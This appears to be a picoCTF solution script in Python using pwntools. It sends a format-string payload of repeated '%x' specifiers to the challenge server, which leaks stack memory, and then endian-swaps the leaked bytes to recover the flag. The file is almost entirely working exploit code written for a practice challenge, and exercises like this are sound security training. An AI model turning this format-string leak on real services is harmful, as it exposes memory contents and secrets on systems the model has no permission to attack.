30 lines
725 B
Python
Executable File
30 lines
725 B
Python
Executable File
#!/usr/bin/env python
|
|
from pwn import *
|
|
|
|
buffer_size = 127
|
|
hex_to_read = 127//2
|
|
hex_reader = b'%x'*hex_to_read
|
|
payload = hex_reader + b'.'
|
|
log.info(f"payload: {payload}")
|
|
|
|
def endian_swap(s, offset=0):
|
|
result = b''
|
|
for i in range(3+offset, len(s), 4):
|
|
result += bytes(reversed(s[i-3:i+1]))
|
|
return result
|
|
|
|
conn = remote("saturn.picoctf.net", 65206)
|
|
|
|
conn.recvuntil(b" >> ")
|
|
conn.sendline(payload)
|
|
conn.recvline()
|
|
data = conn.recvline(keepends=False)[:-1]
|
|
log.info(f"received data: {data}")
|
|
unhexed_data = unhex(data)
|
|
for i in range(4):
|
|
endian_swapped_data = endian_swap(unhexed_data, offset=i)
|
|
if b"picoCTF" in endian_swapped_data:
|
|
break
|
|
log.info(f"processed data: {endian_swapped_data}")
|
|
|